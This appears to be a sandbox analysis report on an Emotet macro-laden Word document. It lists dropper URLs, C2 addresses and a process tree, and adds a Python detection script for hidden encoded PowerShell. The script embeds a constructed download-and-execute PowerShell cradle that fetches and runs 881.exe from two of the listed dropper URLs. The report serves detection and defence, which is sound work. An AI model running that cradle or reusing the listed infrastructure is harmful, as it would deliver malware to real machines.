Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    28-01-2020 01:53

General

  • Target

    5db4c76eff6ffcc419e3775b734cfd1803ceeeecb4249a69d40c6ee435ca03e1.doc

  • Sample

    200128-zbjvvq4axs

  • SHA256

    5db4c76eff6ffcc419e3775b734cfd1803ceeeecb4249a69d40c6ee435ca03e1

Score
10/10

Malware Config

Extracted

Language: ps1
Source: URLs

exe.dropper  http://covaihomes.com/cgi-bin/t3ln/
exe.dropper  http://saxseafood.com/wp-content/VHTlLciKX/
exe.dropper  https://zaamira.com/wp-admin/2sof7o/
exe.dropper  https://shopify-ed.apps.zeroek.com/dist/hxrf9/
exe.dropper  https://sophistproduction.com/wp-includes/Wijy9/

Extracted

Family

emotet

C2

207.177.72.129:8080

23.243.215.4:8080

218.255.173.106:80

136.243.205.112:7080

23.92.16.164:8080

45.55.65.123:8080

217.160.19.232:8080

64.66.6.71:8080

66.34.201.20:7080

85.152.174.56:80

202.175.121.202:8090

87.106.139.101:8080

176.9.43.37:8080

98.156.206.153:80

159.65.25.128:8080

70.184.9.39:8080

209.146.22.34:443

95.213.236.64:8080

98.30.113.161:80

59.103.164.174:80

rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a modular trojan and malware loader, primarily spread through spam emails carrying macro-enabled Office documents such as this one.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information (typically read from HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0) is often queried in order to fingerprint the machine and detect sandboxing environments. Legitimate software reads the same key, so this is a weak indicator on its own and is weighted here by the surrounding behaviour.

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5db4c76eff6ffcc419e3775b734cfd1803ceeeecb4249a69d40c6ee435ca03e1.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    • Suspicious use of SetWindowsHookEx
    PID:4852
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en [encoded command elided]
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Users\Admin\881.exe
      "C:\Users\Admin\881.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4548
      • C:\Users\Admin\881.exe
        --bf0d2c8f
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        PID:4612
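
The process tree above is the whole chain: a hidden PowerShell with an encoded command drops 881.exe into the user-profile root, which then re-launches itself with a single hex argument (--bf0d2c8f). Two details matter for detection. First, Powershell.exe appears as a second root process rather than a child of WINWORD.EXE, which is consistent with the macro launching it indirectly (e.g. through WMI) rather than as a direct child; a rule that only looks for Office-spawns-PowerShell would miss this sample. Second, -en is PowerShell's -EncodedCommand, base64 over UTF-16LE text, so the dropper URLs in the config can be recovered straight from the command line. The following is an added example written for this page (not Triage's own signature code) that runs that logic over constructed process-creation events modelled on the tree; the WmiPrvSE.exe parent, the unrelated PIDs, and the cradle script are assumptions, and the encoded command here is a constructed stand-in for the one elided from the report.

```python
"""Detection logic for the Emotet chain in this report, run over
constructed Sysmon-style process-creation events (not real telemetry)."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full image path
    cmdline: str   # full command line


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden\b")          # -w/-windowstyle hidden
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\",;)]+")
# Dropped binary re-launching itself with one --<8 hex chars> argument,
# as with "--bf0d2c8f" in the report's process tree.
SELF_ARG_RE = re.compile(r"\s--[0-9a-f]{8}\s*$")
# An .exe sitting directly in a user-profile root (C:\Users\<name>\<x>.exe).
USER_ROOT_EXE_RE = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\[^\\]+\.exe$")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode -EncodedCommand: base64 of UTF-16LE script text. None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(script: str) -> List[str]:
    return URL_RE.findall(script)


def analyse(events: List[ProcEvent]) -> List[Dict]:
    """Return findings; parent/child links are resolved through the event list itself."""
    by_pid = {e.pid: e for e in events}
    findings: List[Dict] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else ""
        if name in POWERSHELL:
            if parent_name in OFFICE_APPS:
                findings.append({"pid": e.pid, "rule": "office_spawns_powershell"})
            # Parent-agnostic rule: catches the WMI-launched case in this report.
            if HIDDEN_RE.search(e.cmdline) and ENCODED_RE.search(e.cmdline):
                script = decode_encoded_command(e.cmdline)
                findings.append({"pid": e.pid, "rule": "hidden_encoded_powershell",
                                 "urls": extract_urls(script) if script else []})
        if (USER_ROOT_EXE_RE.match(e.image) and parent
                and parent.image.lower() == e.image.lower()
                and SELF_ARG_RE.search(e.cmdline)):
            findings.append({"pid": e.pid, "rule": "dropped_exe_self_relaunch"})
    return findings


# Constructed Emotet-style cradle (assumption; the real one is elided from the report).
# It uses two of the dropper URLs from the extracted config above.
SAMPLE_CRADLE = (
    "$u='http://covaihomes.com/cgi-bin/t3ln/,https://zaamira.com/wp-admin/2sof7o/'.Split(',');"
    "foreach($w in $u){try{(New-Object Net.WebClient).DownloadFile($w,'881.exe');"
    "Start-Process '881.exe';break}catch{}}"
)
ENCODED_CRADLE = base64.b64encode(SAMPLE_CRADLE.encode("utf-16-le")).decode()

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"
EVENTS = [  # constructed; PIDs 4852/3084/4548/4612 mirror the report, the rest are made up
    ProcEvent(4852, 1234, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sample.doc" /o ""'),
    ProcEvent(1100, 900, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe -secured -Embedding"),
    ProcEvent(3084, 1100, PS_IMAGE, f"Powershell -w hidden -en {ENCODED_CRADLE}"),  # parent is WMI, not Word
    ProcEvent(4548, 3084, r"C:\Users\Admin\881.exe", r'"C:\Users\Admin\881.exe"'),
    ProcEvent(4612, 4548, r"C:\Users\Admin\881.exe", r'"C:\Users\Admin\881.exe" --bf0d2c8f'),
    # Benign control: an admin running a script from Explorer should not fire anything.
    ProcEvent(5000, 2000, PS_IMAGE, r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f)
```

Run as-is it reports two findings: the hidden, encoded PowerShell (PID 3084) together with the two dropper URLs decoded from its command line, and the self-relaunch of 881.exe (PID 4612). The Office-parent rule stays silent, which is the point: pair it with the parent-agnostic rule, and feed any decoded URLs straight into blocklists and proxy log searches.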

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\881.exe

  • memory/4548-8-0x00000000021D0000-0x00000000021E5000-memory.dmp

    Filesize

    84KB

  • memory/4612-10-0x0000000001F90000-0x0000000001FA5000-memory.dmp

    Filesize

    84KB

  • memory/4612-11-0x0000000000400000-0x0000000000463000-memory.dmp

    Filesize

    396KB